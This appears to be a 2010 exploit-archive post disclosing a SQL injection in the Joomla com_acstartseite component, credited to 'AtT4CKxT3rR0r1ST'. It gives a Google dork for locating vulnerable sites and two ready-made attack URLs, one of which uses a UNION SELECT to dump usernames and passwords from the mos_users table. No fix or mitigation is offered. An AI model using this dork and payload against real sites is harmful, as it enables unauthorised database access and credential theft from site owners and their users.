The Joomla ACStartSeite component SQL injection vulnerability

2010-02-18 / 2010-02-19

Credit: AtT4CKxT3rR0r1ST

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Joomla Component com_acstartseite Sql Injection Vulnerability
==============================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Home : www.sec-attack.com/vb [Sec Attack Team]
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : inurl:"com_acstartseite"
####################################################################
===[ Exploit ]===
www.site.com/index.php?option=com_acstartseite&Itemid=null[SQL]&lang=de
www.site.com/index.php?option=com_acstartseite&Itemid=null+and+1=2+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users&lang=de
####################################################################
________________________________
Hotmail: Trusted email with Microsoft?s powerful SPAM protection. Sign up now.<https://signup.live.com/signup.aspx?id=60969>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

The Joomla ACStartSeite component SQL injection vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.